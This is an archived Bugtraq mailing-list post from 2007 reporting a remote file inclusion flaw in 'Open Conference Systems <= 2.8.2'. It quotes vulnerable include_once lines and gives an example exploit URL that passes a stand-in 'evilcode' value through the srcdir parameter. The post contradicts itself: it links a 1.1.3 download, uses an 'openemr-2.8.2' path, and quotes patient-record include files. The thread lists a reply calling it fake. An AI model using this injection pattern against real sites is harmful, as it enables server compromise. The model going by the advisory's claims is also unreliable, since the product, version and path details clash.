Open Conference Systems = 2.8.2 Remote File Inclusion

To:	bugtraq@securityfocus.com
Subject:	Open Conference Systems = 2.8.2 Remote File Inclusion
From:	trzindan@hotmail.com
Date:	27 Jan 2007 12:52:38 -0000
Delivered-to:	sp-com-lists@consult.net
Delivered-to:	bugtraq-list@securepoint.com
Delivered-to:	mailing list bugtraq@securityfocus.com
Delivered-to:	moderator for bugtraq@securityfocus.com
List-help:	<mailto:bugtraq-help@securityfocus.com>
List-id:	<bugtraq.list-id.securityfocus.com>
List-post:	<mailto:bugtraq@securityfocus.com>
List-subscribe:	<mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe:	<mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list:	contact bugtraq-help@securityfocus.com; run by ezmlm

#########################################################################
# Open Conference Systems <= 2.8.2 Remote File Inclusion
# Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
#
# Found By        : Tr_ZiNDaN
# Location        : TurkeY --  #trzindan@hotmail.fr
########################################################################
file ;
  import_xml.php
  
########################################################################
bugs ;
at -- import_xml.php

include_once("$srcdir/patient.inc");
include_once("$srcdir/acl.inc");

########################################################################
exmple and methode exploit ;
 http://localhost/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode?

########################################################################
Thanks;
str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,Crackers_Child,KurtEfendy,
Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,aLman,k1tk4t ;) MusLim Hackers

########################################################################

T3k T4b4nC4 2oo7~

<Prev in Thread]	Current Thread	[Next in Thread>
Open Conference Systems = 2.8.2 Remote File Inclusion, trzindan <= Re: Open Conference Systems = 2.8.2 Remote File Inclusion, Michał Melewski Fake: Open Conference Systems = 2.8.2 Remote File Inclusion, bzhbfzj3001 Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion, Michał Melewski Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion, Michał Melewski Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion, bzhbfzj3001 Re: Open Conference Systems = 2.8.2 Remote File Inclusion, Stefano Zanero

Previous by Date:	Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger, Outlaw
Next by Date:	[ MDKSA-2007:028 ] - Updated ulogd packaged to address buffer overflow vulnerability, security
Previous by Thread:	[USN-398-4] Firefox regression, Kees Cook
Next by Thread:	Re: Open Conference Systems = 2.8.2 Remote File Inclusion, Michał Melewski
Indexes:	[Date] [Thread] [Top] [All Lists]